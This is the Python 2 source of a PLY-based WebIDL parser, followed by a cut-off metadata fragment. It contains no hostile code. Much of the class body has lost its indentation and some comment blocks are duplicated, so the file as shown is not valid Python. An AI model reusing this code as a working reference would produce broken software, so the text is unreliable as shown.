# Disable check for line length and Member as Function due to how grammar rules
# are defined with PLY
#
# pylint: disable=R0201
# pylint: disable=C0301
import os.path
import sys
import time
from idl_lexer import IDLLexer
from idl_node import IDLAttribute, IDLNode
#
# Try to load the ply module, if not, then assume it is in the third_party
# directory.
#
#
# Try to load the ply module, if not, then assume it is in the third_party
# directory.
#
try:
  # Disable lint check which fails to find the ply module.
  # pylint: disable=F0401
  from ply import lex
  from ply import yacc
except ImportError:
  # Fall back to the copy of PLY bundled two directories up, under
  # third_party.
  module_path, module_name = os.path.split(__file__)
  # BUG FIX: os.par does not exist; the parent-directory constant is
  # os.pardir, so the original raised AttributeError on this fallback path.
  third_party = os.path.join(module_path, os.pardir, os.pardir, 'third_party')
  sys.path.append(third_party)
  # pylint: disable=F0401
  from ply import lex
  from ply import yacc
#
# ERROR_REMAP
#
# Maps the standard error formula into a more friendly error message.
#
# NOTE: keys must match, byte for byte, the messages composed in p_error()
# from TokenTypeName(), since p_error() does a plain dict lookup here.
ERROR_REMAP = {
  'Unexpected ")" after "(".' : 'Empty argument list.',
  'Unexpected ")" after ",".' : 'Missing argument.',
  'Unexpected "}" after ",".' : 'Trailing comma in block.',
  'Unexpected "}" after "{".' : 'Unexpected empty block.',
  'Unexpected comment after "}".' : 'Unexpected trailing comment.',
  'Unexpected "{" after keyword "enum".' : 'Enum missing name.',
  'Unexpected "{" after keyword "struct".' : 'Struct missing name.',
  'Unexpected "{" after keyword "interface".' : 'Interface missing name.',
}
def Boolean(val):
  """Convert to strict boolean type."""
  # bool() yields exactly the True/False the original if/else produced.
  return bool(val)
def ListFromConcat(*items):
  """Generate list by concatenating inputs"""
  # None entries are dropped; exact-type lists are spliced in; everything
  # else (including tuples and list subclasses) is appended as one element.
  combined = []
  for entry in items:
    if entry is None:
      continue
    if type(entry) is list:
      combined.extend(entry)
    else:
      combined.append(entry)
  return combined
def ExpandProduction(p):
  """Render a production item (or list of items) as a tagged debug string."""
  if type(p) == list:
    # Recurse into lists, joining the children inside brackets.
    expanded = [ExpandProduction(child) for child in p]
    return '[' + ', '.join(expanded) + ']'
  if type(p) == IDLNode:
    return 'Node:' + str(p)
  if type(p) == IDLAttribute:
    return 'Attr:' + str(p)
  if type(p) == str:
    return 'str:' + p
  # Anything else: fall back to class name plus string form.
  return '%s:%s' % (p.__class__.__name__, str(p))
# TokenTypeName
#
# Generate a string which has the type and value of the token.
#
# TokenTypeName
#
# Generate a string which has the type and value of the token.
#
def TokenTypeName(token):
  """Describe a lexer token as '<kind> <value>' for error messages."""
  kind = token.type
  if kind == 'SYMBOL':
    return 'symbol %s' % token.value
  elif kind in ('HEX', 'INT', 'OCT', 'FLOAT'):
    return 'value %s' % token.value
  elif kind == 'string':
    return 'string "%s"' % token.value
  elif kind == 'COMMENT':
    return 'comment'
  elif kind == token.value:
    # Punctuation tokens have type == value (e.g. '{', ';').
    return '"%s"' % token.value
  elif kind == ',':
    return 'Comma'
  elif kind == 'identifier':
    return 'identifier "%s"' % token.value
  return 'keyword "%s"' % token.value
#
# IDL Parser
#
# The Parser inherits the from the Lexer to provide PLY with the tokenizing
# definitions. Parsing patterns are encoded as functions where p_<name> is
# is called any time a patern matching the function documentation is found.
# Paterns are expressed in the form of:
# """ <new item> : <item> ....
# | <item> ...."""
#
# Where new item is the result of a match against one or more sets of items
# separated by the "|".
#
# The function is called with an object 'p' where p[0] is the output object
# and p[n] is the set of inputs for positive values of 'n'. Len(p) can be
# used to distinguish between multiple item sets in the pattern.
#
# For more details on parsing refer to the PLY documentation at
# http://www.dabeaz.com/ply/
#
# The parser is based on the WebIDL standard. See:
# http://heycam.github.io/webidl/#idl-grammar
#
# The various productions are annotated so that the WHOLE number greater than
# zero in the comment denotes the matching WebIDL grammar definition.
#
# Productions with a fractional component in the comment denote additions to
# the WebIDL spec, such as comments.
#
class IDLParser(object):
#
# We force all input files to start with two comments. The first comment is a
# Copyright notice followed by a file comment and finally by file level
# productions.
#
# [0] Insert a TOP definition for Copyright and Comments
def p_Top(self, p):
"""Top : COMMENT COMMENT Definitions"""
Copyright = self.BuildComment('Copyright', p, 1)
Filedoc = self.BuildComment('Comment', p, 2)
p[0] = ListFromConcat(Copyright, Filedoc, p[3])
# [0.1] Add support for Multiple COMMENTS
def p_Comments(self, p):
"""Comments : CommentsRest"""
if len(p) > 1:
p[0] = p[1]
# [0.2] Produce a COMMENT and aggregate sibling comments
def p_CommentsRest(self, p):
"""CommentsRest : COMMENT CommentsRest
| """
if len(p) > 1:
p[0] = ListFromConcat(self.BuildComment('Comment', p, 1), p[2])
#
#The parser is based on the WebIDL standard. See:
# http://heycam.github.io/webidl/#idl-grammar
#
# [1]
def p_Definitions(self, p):
"""Definitions : ExtendedAttributeList Definition Definitions
| """
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [2]
def p_Definition(self, p):
"""Definition : CallbackOrInterface
| Partial
| Dictionary
| Exception
| Enum
| Typedef
| ImplementsStatement"""
p[0] = p[1]
# [2.1] Error recovery for definition
def p_DefinitionError(self, p):
"""Definition : error ';'"""
p[0] = self.BuildError(p, 'Definition')
# [3]
def p_CallbackOrInterface(self, p):
"""CallbackOrInterface : CALLBACK CallbackRestOrInterface
| Interface"""
if len(p) > 2:
p[0] = p[2]
else:
p[0] = p[1]
# [4]
def p_CallbackRestOrInterface(self, p):
"""CallbackRestOrInterface : CallbackRest
| Interface"""
p[0] = p[1]
# [5]
def p_Interface(self, p):
"""Interface : INTERFACE identifier Inheritance '{' InterfaceMembers '}' ';'"""
p[0] = self.BuildNamed('Interface', p, 2, ListFromConcat(p[3], p[5]))
# [6]
def p_Partial(self, p):
"""Partial : PARTIAL PartialDefinition"""
p[2].AddChildren(self.BuildTrue('Partial'))
p[0] = p[2]
# [6.1] Error recovery for Partial
def p_PartialError(self, p):
"""Partial : PARTIAL error"""
p[0] = self.BuildError(p, 'Partial')
# [7]
def p_PartialDefinition(self, p):
"""PartialDefinition : PartialDictionary
| PartialInterface"""
p[0] = p[1]
# [8]
def p_PartialInterface(self, p):
"""PartialInterface : INTERFACE identifier '{' InterfaceMembers '}' ';'"""
p[0] = self.BuildNamed('Interface', p, 2, p[4])
# [9]
def p_InterfaceMembers(self, p):
"""InterfaceMembers : ExtendedAttributeList InterfaceMember InterfaceMembers
|"""
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [10]
def p_InterfaceMember(self, p):
"""InterfaceMember : Const
| AttributeOrOperationOrIterator"""
p[0] = p[1]
# [11]
def p_Dictionary(self, p):
"""Dictionary : DICTIONARY identifier Inheritance '{' DictionaryMembers '}' ';'"""
p[0] = self.BuildNamed('Dictionary', p, 2, ListFromConcat(p[3], p[5]))
# [11.1] Error recovery for regular Dictionary
def p_DictionaryError(self, p):
"""Dictionary : DICTIONARY error ';'"""
p[0] = self.BuildError(p, 'Dictionary')
# [12]
def p_DictionaryMembers(self, p):
"""DictionaryMembers : ExtendedAttributeList DictionaryMember DictionaryMembers
|"""
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [13]
def p_DictionaryMember(self, p):
"""DictionaryMember : Type identifier Default ';'"""
p[0] = self.BuildNamed('Key', p, 2, ListFromConcat(p[1], p[3]))
# [14]
def p_PartialDictionary(self, p):
"""PartialDictionary : DICTIONARY identifier '{' DictionaryMembers '}' ';'"""
partial = self.BuildTrue('Partial')
p[0] = self.BuildNamed('Dictionary', p, 2, ListFromConcat(p[4], partial))
# [14.1] Error recovery for Partial Dictionary
def p_PartialDictionaryError(self, p):
"""PartialDictionary : DICTIONARY error ';'"""
p[0] = self.BuildError(p, 'PartialDictionary')
# [15]
def p_Default(self, p):
"""Default : '=' DefaultValue
|"""
if len(p) > 1:
p[0] = self.BuildProduction('Default', p, 2, p[2])
# [16]
def p_DefaultValue(self, p):
"""DefaultValue : ConstValue
| string"""
if type(p[1]) == str:
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'DOMString'),
self.BuildAttribute('NAME', p[1]))
else:
p[0] = p[1]
# [17]
def p_Exception(self, p):
"""Exception : EXCEPTION identifier Inheritance '{' ExceptionMembers '}' ';'"""
p[0] = self.BuildNamed('Exception', p, 2, ListFromConcat(p[3], p[5]))
# [18]
def p_ExceptionMembers(self, p):
"""ExceptionMembers : ExtendedAttributeList ExceptionMember ExceptionMembers
|"""
if len(p) > 1:
p[2].AddChildren(p[1])
p[0] = ListFromConcat(p[2], p[3])
# [18.1] Error recovery for ExceptionMembers
def p_ExceptionMembersError(self, p):
"""ExceptionMembers : error"""
p[0] = self.BuildError(p, 'ExceptionMembers')
# [19]
def p_Inheritance(self, p):
"""Inheritance : ':' identifier
|"""
if len(p) > 1:
p[0] = self.BuildNamed('Inherit', p, 2)
# [20]
def p_Enum(self, p):
"""Enum : ENUM identifier '{' EnumValueList '}' ';'"""
p[0] = self.BuildNamed('Enum', p, 2, p[4])
# [20.1] Error recovery for Enums
def p_EnumError(self, p):
"""Enum : ENUM error ';'"""
p[0] = self.BuildError(p, 'Enum')
# [21]
def p_EnumValueList(self, p):
"""EnumValueList : ExtendedAttributeList string EnumValueListComma"""
enum = self.BuildNamed('EnumItem', p, 2, p[1])
p[0] = ListFromConcat(enum, p[3])
# [22]
def p_EnumValueListComma(self, p):
"""EnumValueListComma : ',' EnumValueListString
|"""
if len(p) > 1:
p[0] = p[2]
# [23]
def p_EnumValueListString(self, p):
"""EnumValueListString : ExtendedAttributeList string EnumValueListComma
|"""
if len(p) > 1:
enum = self.BuildNamed('EnumItem', p, 2, p[1])
p[0] = ListFromConcat(enum, p[3])
# [24]
def p_CallbackRest(self, p):
"""CallbackRest : identifier '=' ReturnType '(' ArgumentList ')' ';'"""
arguments = self.BuildProduction('Arguments', p, 4, p[5])
p[0] = self.BuildNamed('Callback', p, 1, ListFromConcat(p[3], arguments))
# [25]
def p_Typedef(self, p):
"""Typedef : TYPEDEF ExtendedAttributeListNoComments Type identifier ';'"""
p[0] = self.BuildNamed('Typedef', p, 4, ListFromConcat(p[2], p[3]))
# [25.1] Error recovery for Typedefs
def p_TypedefError(self, p):
"""Typedef : TYPEDEF error ';'"""
p[0] = self.BuildError(p, 'Typedef')
# [26]
def p_ImplementsStatement(self, p):
"""ImplementsStatement : identifier IMPLEMENTS identifier ';'"""
name = self.BuildAttribute('REFERENCE', p[3])
p[0] = self.BuildNamed('Implements', p, 1, name)
# [27]
def p_Const(self, p):
"""Const : CONST ConstType identifier '=' ConstValue ';'"""
value = self.BuildProduction('Value', p, 5, p[5])
p[0] = self.BuildNamed('Const', p, 3, ListFromConcat(p[2], value))
# [28]
def p_ConstValue(self, p):
"""ConstValue : BooleanLiteral
| FloatLiteral
| integer
| null"""
if type(p[1]) == str:
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'integer'),
self.BuildAttribute('NAME', p[1]))
else:
p[0] = p[1]
# [28.1] Add definition for NULL
def p_null(self, p):
"""null : NULL"""
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'NULL'),
self.BuildAttribute('NAME', 'NULL'))
# [29]
def p_BooleanLiteral(self, p):
"""BooleanLiteral : TRUE
| FALSE"""
value = self.BuildAttribute('VALUE', Boolean(p[1] == 'true'))
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'boolean'), value)
# [30]
def p_FloatLiteral(self, p):
"""FloatLiteral : float
| '-' INFINITY
| INFINITY
| NAN """
if len(p) > 2:
val = '-Infinity'
else:
val = p[1]
p[0] = ListFromConcat(self.BuildAttribute('TYPE', 'float'),
self.BuildAttribute('VALUE', val))
# [31] Removed unsupported: Serializer, Stringifier
def p_AttributeOrOperationOrIterator(self, p):
"""AttributeOrOperationOrIterator : StaticMember
| Attribute
| OperationOrIterator"""
p[0] = p[1]
# [32-37] NOT IMPLEMENTED (Serializer)
# [38-39] FIXME: NOT IMPLEMENTED (Stringifier) http://crbug.com/306606
# [40]
def p_StaticMember(self, p):
"""StaticMember : STATIC StaticMemberRest"""
p[2].AddChildren(self.BuildTrue('STATIC'))
p[0] = p[2]
# [41]
def p_StaticMemberRest(self, p):
"""StaticMemberRest : AttributeRest
| ReturnType OperationRest"""
if len(p) == 2:
p[0] = p[1]
else:
p[2].AddChildren(p[1])
p[0] = p[2]
# [42]
def p_Attribute(self, p):
"""Attribute : Inherit AttributeRest"""
p[2].AddChildren(ListFromConcat(p[1]))
p[0] = p[2]
# [43]
def p_AttributeRest(self, p):
"""AttributeRest : ReadOnly ATTRIBUTE Type identifier ';'"""
p[0] = self.BuildNamed('Attribute', p, 4,
ListFromConcat(p[1], p[3]))
# [44]
def p_Inherit(self, p):
"""Inherit : INHERIT
|"""
if len(p) > 1:
p[0] = self.BuildTrue('INHERIT')
# [45]
def p_ReadOnly(self, p):
"""ReadOnly : READONLY
|"""
if len(p) > 1:
p[0] = self.BuildTrue('READONLY')
# [46]
def p_OperationOrIterator(self, p):
"""OperationOrIterator : ReturnType OperationOrIteratorRest
| SpecialOperation"""
if len(p) == 3:
p[2].AddChildren(p[1])
p[0] = p[2]
else:
p[0] = p[1]
# [47]
def p_SpecialOperation(self, p):
"""SpecialOperation : Special Specials ReturnType OperationRest"""
p[4].AddChildren(ListFromConcat(p[1], p[2], p[3]))
p[0] = p[4]
# [48]
def p_Specials(self, p):
"""Specials : Special Specials
| """
if len(p) > 1:
p[0] = ListFromConcat(p[1], p[2])
# [49]
def p_Special(self, p):
"""Special : GETTER
| SETTER
| CREATOR
| DELETER
| LEGACYCALLER"""
p[0] = self.BuildTrue(p[1].upper())
# [50] Removed unsupported: IteratorRest
def p_OperationOrIteratorRest(self, p):
"""OperationOrIteratorRest : OperationRest"""
p[0] = p[1]
# [51-53] NOT IMPLEMENTED (IteratorRest)
# [54]
def p_OperationRest(self, p):
"""OperationRest : OptionalIdentifier '(' ArgumentList ')' ';'"""
arguments = self.BuildProduction('Arguments', p, 2, p[3])
p[0] = self.BuildNamed('Operation', p, 1, arguments)
# [55]
def p_OptionalIdentifier(self, p):
"""OptionalIdentifier : identifier
|"""
if len(p) > 1:
p[0] = p[1]
else:
p[0] = '_unnamed_'
# [56]
def p_ArgumentList(self, p):
"""ArgumentList : Argument Arguments
|"""
if len(p) > 1:
p[0] = ListFromConcat(p[1], p[2])
# [56.1] ArgumentList error recovery
def p_ArgumentListError(self, p):
"""ArgumentList : error """
p[0] = self.BuildError(p, 'ArgumentList')
# [57]
def p_Arguments(self, p):
"""Arguments : ',' Argument Arguments
|"""
if len(p) > 1:
p[0] = ListFromConcat(p[2], p[3])
# [58]
def p_Argument(self, p):
"""Argument : ExtendedAttributeList OptionalOrRequiredArgument"""
p[2].AddChildren(p[1])
p[0] = p[2]
# [59]
def p_OptionalOrRequiredArgument(self, p):
"""OptionalOrRequiredArgument : OPTIONAL Type ArgumentName Default
| Type Ellipsis ArgumentName"""
if len(p) > 4:
arg = self.BuildNamed('Argument', p, 3, ListFromConcat(p[2], p[4]))
arg.AddChildren(self.BuildTrue('OPTIONAL'))
else:
arg = self.BuildNamed('Argument', p, 3, ListFromConcat(p[1], p[2]))
p[0] = arg
# [60]
def p_ArgumentName(self, p):
"""ArgumentName : ArgumentNameKeyword
| identifier"""
p[0] = p[1]
# [61]
def p_Ellipsis(self, p):
"""Ellipsis : ELLIPSIS
|"""
if len(p) > 1:
p[0] = self.BuildNamed('Argument', p, 1)
p[0].AddChildren(self.BuildTrue('ELLIPSIS'))
# [62]
def p_ExceptionMember(self, p):
"""ExceptionMember : Const
| ExceptionField"""
p[0] = p[1]
# [63]
def p_ExceptionField(self, p):
"""ExceptionField : Type identifier ';'"""
p[0] = self.BuildNamed('ExceptionField', p, 2, p[1])
# [63.1] Error recovery for ExceptionMembers
def p_ExceptionFieldError(self, p):
"""ExceptionField : error"""
p[0] = self.BuildError(p, 'ExceptionField')
# [64] No comment version for mid statement attributes.
def p_ExtendedAttributeListNoComments(self, p):
"""ExtendedAttributeListNoComments : '[' ExtendedAttribute ExtendedAttributes ']'
| """
if len(p) > 2:
items = ListFromConcat(p[2], p[3])
p[0] = self.BuildProduction('ExtAttributes', p, 1, items)
# [64.1] Add optional comment field for start of statements.
def p_ExtendedAttributeList(self, p):
"""ExtendedAttributeList : Comments '[' ExtendedAttribute ExtendedAttributes ']'
| Comments """
if len(p) > 2:
items = ListFromConcat(p[3], p[4])
attribs = self.BuildProduction('ExtAttributes', p, 2, items)
p[0] = ListFromConcat(p[1], attribs)
else:
p[0] = p[1]
# [65]
def p_ExtendedAttributes(self, p):
"""ExtendedAttributes : ',' ExtendedAttribute ExtendedAttributes
|"""
if len(p) > 1:
p[0] = ListFromConcat(p[2], p[3])
# We only support:
# [ identifier ]
# [ identifier = identifier ]
# [ identifier ( ArgumentList )]
# [ identifier = identifier ( ArgumentList )]
# [66] map directly to [91-93, 95]
# [67-69, 71] are unsupported
def p_ExtendedAttribute(self, p):
"""ExtendedAttribute : ExtendedAttributeNoArgs
| ExtendedAttributeArgList
| ExtendedAttributeIdent
| ExtendedAttributeNamedArgList"""
p[0] = p[1]
# [70]
def p_ArgumentNameKeyword(self, p):
"""ArgumentNameKeyword : ATTRIBUTE
| CALLBACK
| CONST
| CREATOR
| DELETER
| DICTIONARY
| ENUM
| EXCEPTION
| GETTER
| IMPLEMENTS
| INHERIT
| LEGACYCALLER
| PARTIAL
| SERIALIZER
| SETTER
| STATIC
| STRINGIFIER
| TYPEDEF
| UNRESTRICTED"""
p[0] = p[1]
# [72]
def p_Type(self, p):
"""Type : SingleType
| UnionType TypeSuffix"""
if len(p) == 2:
p[0] = self.BuildProduction('Type', p, 1, p[1])
else:
p[0] = self.BuildProduction('Type', p, 1, ListFromConcat(p[1], p[2]))
# [73]
def p_SingleType(self, p):
"""SingleType : NonAnyType
| ANY TypeSuffixStartingWithArray"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = ListFromConcat(self.BuildProduction('Any', p, 1), p[2])
# [74]
def p_UnionType(self, p):
"""UnionType : '(' UnionMemberType OR UnionMemberType UnionMemberTypes ')'"""
# [75]
def p_UnionMemberType(self, p):
"""UnionMemberType : NonAnyType
| UnionType TypeSuffix
| ANY '[' ']' TypeSuffix"""
# [76]
def p_UnionMemberTypes(self, p):
"""UnionMemberTypes : OR UnionMemberType UnionMemberTypes
|"""
# [77] Moved BYTESTRING, DOMSTRING, OBJECT, DATE, REGEXP to PrimitiveType
# Moving all built-in types into PrimitiveType makes it easier to
# differentiate between them and 'identifier', since p[1] would be a string in
# both cases.
def p_NonAnyType(self, p):
"""NonAnyType : PrimitiveType TypeSuffix
| identifier TypeSuffix
| SEQUENCE '<' Type '>' Null"""
if len(p) == 3:
if type(p[1]) == str:
typeref = self.BuildNamed('Typeref', p, 1)
else:
typeref = p[1]
p[0] = ListFromConcat(typeref, p[2])
if len(p) == 6:
p[0] = self.BuildProduction('Sequence', p, 1, ListFromConcat(p[3], p[5]))
# [78]
def p_ConstType(self, p):
"""ConstType : PrimitiveType Null
| identifier Null"""
if type(p[1]) == str:
p[0] = self.BuildNamed('Typeref', p, 1, p[2])
else:
p[1].AddChildren(p[2])
p[0] = p[1]
# [79] Added BYTESTRING, DOMSTRING, OBJECT, DATE, REGEXP
def p_PrimitiveType(self, p):
"""PrimitiveType : UnsignedIntegerType
| UnrestrictedFloatType
| BOOLEAN
| BYTE
| OCTET
| BYTESTRING
| DOMSTRING
| OBJECT
| DATE
| REGEXP"""
if type(p[1]) == str:
p[0] = self.BuildNamed('PrimitiveType', p, 1)
else:
p[0] = p[1]
# [80]
def p_UnrestrictedFloatType(self, p):
"""UnrestrictedFloatType : UNRESTRICTED FloatType
| FloatType"""
if len(p) == 2:
typeref = self.BuildNamed('PrimitiveType', p, 1)
else:
typeref = self.BuildNamed('PrimitiveType', p, 2)
typeref.AddChildren(self.BuildTrue('UNRESTRICTED'))
p[0] = typeref
# [81]
def p_FloatType(self, p):
"""FloatType : FLOAT
| DOUBLE"""
p[0] = p[1]
# [82]
def p_UnsignedIntegerType(self, p):
"""UnsignedIntegerType : UNSIGNED IntegerType
| IntegerType"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = 'unsigned ' + p[2]
# [83]
def p_IntegerType(self, p):
"""IntegerType : SHORT
| LONG OptionalLong"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = p[1] + p[2]
# [84]
def p_OptionalLong(self, p):
"""OptionalLong : LONG
| """
if len(p) > 1:
p[0] = ' ' + p[1]
else:
p[0] = ''
# [85] Add support for sized array
def p_TypeSuffix(self, p):
"""TypeSuffix : '[' integer ']' TypeSuffix
| '[' ']' TypeSuffix
| '?' TypeSuffixStartingWithArray
| """
if len(p) == 5:
p[0] = self.BuildNamed('Array', p, 2, p[4])
if len(p) == 4:
p[0] = self.BuildProduction('Array', p, 1, p[3])
if len(p) == 3:
p[0] = ListFromConcat(self.BuildTrue('NULLABLE'), p[2])
# [86]
def p_TypeSuffixStartingWithArray(self, p):
"""TypeSuffixStartingWithArray : '[' ']' TypeSuffix
| """
if len(p) > 1:
p[0] = self.BuildProduction('Array', p, 0, p[3])
# [87]
def p_Null(self, p):
"""Null : '?'
|"""
if len(p) > 1:
p[0] = self.BuildTrue('NULLABLE')
# [88]
def p_ReturnType(self, p):
"""ReturnType : Type
| VOID"""
if p[1] == 'void':
p[0] = self.BuildProduction('Type', p, 1)
p[0].AddChildren(self.BuildNamed('PrimitiveType', p, 1))
else:
p[0] = p[1]
# [89-90] NOT IMPLEMENTED (IdentifierList)
# [91]
def p_ExtendedAttributeNoArgs(self, p):
"""ExtendedAttributeNoArgs : identifier"""
p[0] = self.BuildNamed('ExtAttribute', p, 1)
# [92]
def p_ExtendedAttributeArgList(self, p):
"""ExtendedAttributeArgList : identifier '(' ArgumentList ')'"""
arguments = self.BuildProduction('Arguments', p, 2, p[3])
p[0] = self.BuildNamed('ExtAttribute', p, 1, arguments)
# [93]
def p_ExtendedAttributeIdent(self, p):
"""ExtendedAttributeIdent : identifier '=' identifier"""
value = self.BuildAttribute('VALUE', p[3])
p[0] = self.BuildNamed('ExtAttribute', p, 1, value)
# [94] NOT IMPLEMENTED (ExtendedAttributeIdentList)
# [95]
def p_ExtendedAttributeNamedArgList(self, p):
"""ExtendedAttributeNamedArgList : identifier '=' identifier '(' ArgumentList ')'"""
args = self.BuildProduction('Arguments', p, 4, p[5])
value = self.BuildNamed('Call', p, 3, args)
p[0] = self.BuildNamed('ExtAttribute', p, 1, value)
# [96] NOT IMPLEMENTED (ExtendedAttributeTypePair)
#
# Parser Errors
#
# p_error is called whenever the parser can not find a pattern match for
# a set of items from the current state. The p_error function defined here
# is triggered logging an error, and parsing recovery happens as the
# p_<type>_error functions defined above are called. This allows the parser
# to continue so as to capture more than one error per file.
#
def p_error(self, t):
  # PLY error callback: compose a friendly message and record the error
  # location so p_<type>_error recovery rules can resume parsing.
  if t:
    lineno = t.lineno
    pos = t.lexpos
    # Include the previous symbol in the message when it was a raw token.
    prev = self.yaccobj.symstack[-1]
    if type(prev) == lex.LexToken:
      msg = "Unexpected %s after %s." % (
          TokenTypeName(t), TokenTypeName(prev))
    else:
      msg = "Unexpected %s." % (t.value)
  else:
    # t is None at end of input: report against the last token seen and
    # restart the parser state.
    last = self.LastToken()
    lineno = last.lineno
    pos = last.lexpos
    msg = "Unexpected end of file after %s." % TokenTypeName(last)
    self.yaccobj.restart()

  # Attempt to remap the error to a friendlier form
  if msg in ERROR_REMAP:
    msg = ERROR_REMAP[msg]

  self._last_error_msg = msg
  self._last_error_lineno = lineno
  self._last_error_pos = pos
def Warn(self, node, msg):
  """Write a warning for |node| to stdout and bump the warning counter."""
  sys.stdout.write(node.GetLogLine(msg))
  # BUG FIX: __init__ and ParseText initialize self._parse_warnings (with
  # a leading underscore); the old code incremented the never-initialized
  # self.parse_warnings, raising AttributeError on the first warning.
  self._parse_warnings += 1
def LastToken(self):
  # The most recent token produced by the lexer; used for positioning
  # end-of-file and internal-error messages.
  return self.lexer.last
def __init__(self, lexer, verbose=False, debug=False, mute_error=False):
  # Args:
  #   lexer: IDL lexer instance providing tokens and KnownTokens().
  #   verbose: enable extra progress output.
  #   debug: passed through to yacc for parser debugging.
  #   mute_error: suppress printing error messages (errors still counted).
  self.lexer = lexer
  self.tokens = lexer.KnownTokens()
  # Build the LALR tables in memory every run; table caching is disabled
  # so the grammar embedded in the p_* docstrings is always authoritative.
  self.yaccobj = yacc.yacc(module=self, tabmodule=None, debug=debug,
                           optimize=0, write_tables=0)
  self.parse_debug = debug
  self.verbose = verbose
  self.mute_error = mute_error
  # Per-parse error/warning state; reset again in ParseText().
  self._parse_errors = 0
  self._parse_warnings = 0
  self._last_error_msg = None
  self._last_error_lineno = 0
  self._last_error_pos = 0
#
# BuildProduction
#
# Production is the set of items sent to a grammar rule resulting in a new
# item being returned.
#
# p - Is the Yacc production object containing the stack of items
# index - Index into the production of the name for the item being produced.
# cls - The type of item being producted
# childlist - The children of the new item
def BuildProduction(self, cls, p, index, childlist=None):
  # Create an IDLNode of type |cls| positioned at production item |index|.
  # Returns the new node; see the comment block above for argument details.
  try:
    if not childlist:
      childlist = []
    filename = self.lexer.Lexer().filename
    lineno = p.lineno(index)
    pos = p.lexpos(index)
    out = IDLNode(cls, filename, lineno, pos, childlist)
    return out
  except:
    # NOTE(review): bare except is deliberate -- dump the production stack
    # for debugging, then re-raise the original exception unchanged.
    print 'Exception while parsing:'
    for num, item in enumerate(p):
      print ' [%d] %s' % (num, ExpandProduction(item))
    if self.LastToken():
      print 'Last token: %s' % str(self.LastToken())
    raise
def BuildNamed(self, cls, p, index, childlist=None):
  # Like BuildProduction, but also attaches a NAME attribute taken from
  # the production item at |index|.
  childlist = ListFromConcat(childlist)
  childlist.append(self.BuildAttribute('NAME', p[index]))
  return self.BuildProduction(cls, p, index, childlist)
def BuildComment(self, cls, p, index):
  """Build a comment node with the comment markers stripped from the text.

  Attaches a NAME attribute holding the cleaned text and a FORM attribute
  ('cc' for C++ style, 'c' for C style).
  """
  raw = p[index]
  cleaned = []
  if raw[:2] == '//':
    # C++ style: drop everything through the '//' marker on each line.
    form = 'cc'
    for text in raw.split('\n'):
      marker = text.find('//')
      cleaned.append(text[marker + 2:])
  else:
    # C style: drop the trailing '*/', then strip each line up to and
    # including its leading '*'; lines without one become empty.
    form = 'c'
    for text in raw[:-2].split('\n'):
      star = text.find('*')
      if star >= 0:
        cleaned.append(text[star + 1:].rstrip())
      else:
        cleaned.append('')
  children = [self.BuildAttribute('NAME', '\n'.join(cleaned)),
              self.BuildAttribute('FORM', form)]
  return self.BuildProduction(cls, p, index, children)
#
# BuildError
#
# Build and Errror node as part of the recovery process.
#
#
def BuildError(self, p, prod):
  # Build an Error node during error recovery from the message/position
  # recorded by p_error().  |prod| names the production that failed.
  self._parse_errors += 1
  name = self.BuildAttribute('NAME', self._last_error_msg)
  line = self.BuildAttribute('LINE', self._last_error_lineno)
  pos = self.BuildAttribute('POS', self._last_error_pos)
  prod = self.BuildAttribute('PROD', prod)
  node = self.BuildProduction('Error', p, 1,
                              ListFromConcat(name, line, pos, prod))
  if not self.mute_error:
    node.Error(self._last_error_msg)
  return node
#
# BuildAttribute
#
# An ExtendedAttribute is a special production that results in a property
# which is applied to the adjacent item. Attributes have no children and
# instead represent key/value pairs.
#
def BuildAttribute(self, key, val):
  # A key/value property applied to the adjacent node; has no children.
  return IDLAttribute(key, val)
def BuildFalse(self, key):
  # Convenience: a boolean attribute fixed to False.
  return IDLAttribute(key, Boolean(False))
def BuildTrue(self, key):
  # Convenience: a boolean attribute fixed to True.
  return IDLAttribute(key, Boolean(True))
def GetErrors(self):
  # Total error count for the last parse: parser errors plus lexer errors.
  # Access lexer errors, despite being private
  # pylint: disable=W0212
  return self._parse_errors + self.lexer._lex_errors
#
# ParseData
#
# Attempts to parse the current data loaded in the lexer.
#
def ParseText(self, filename, data):
  # Parse |data| (the contents of |filename|) and return a 'File' IDLNode
  # whose children are the parsed definitions plus a NAME attribute.
  # Returns None if tokenizing fails with a LexError.
  self._parse_errors = 0
  self._parse_warnings = 0
  self._last_error_msg = None
  self._last_error_lineno = 0
  self._last_error_pos = 0

  try:
    self.lexer.Tokenize(data, filename)
    nodes = self.yaccobj.parse(lexer=self.lexer) or []
    name = self.BuildAttribute('NAME', filename)
    return IDLNode('File', filename, 0, 0, nodes + [name])
  except lex.LexError as lexError:
    sys.stderr.write('Error in token: %s\n' % str(lexError))
  return None
def ParseFile(parser, filename):
  """Parse a file and return a File type of node."""
  with open(filename) as fileobject:
    try:
      out = parser.ParseText(filename, fileobject.read())
      # Record the file's mtime and the parse error count on the node.
      out.SetProperty('DATETIME', time.ctime(os.path.getmtime(filename)))
      out.SetProperty('ERRORS', parser.GetErrors())
      return out
    except Exception as e:
      # Broad catch: report any internal failure at the last token's
      # position; implicitly returns None in that case.
      last = parser.LastToken()
      sys.stderr.write('%s(%d) : Internal parsing error\n\t%s.\n' % (
          filename, last.lineno, str(e)))
def main(argv):
  # Parse every file named in argv, print the combined AST, and return
  # the total number of errors found (0 means success).
  nodes = []
  parser = IDLParser(IDLLexer())
  errors = 0
  for filename in argv:
    filenode = ParseFile(parser, filename)
    if (filenode):
      errors += filenode.GetProperty('ERRORS')
      nodes.append(filenode)
  ast = IDLNode('AST', '__AST__', 0, 0, nodes)
  print '\n'.join(ast.Tree(accept_props=['PROD']))
  if errors:
    print '\nFound %d errors.\n' % errors
  return errors
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
{
"content_hash": "abcfd2f4995adfbee59e46ee01a10b32",
"timestamp": "",
"source": "github",
"line_count": 1085,
"max_line_length": 88,
"avg_line_length": 29.62027649769585,
"alnum_prop": 0.5785051963407803,
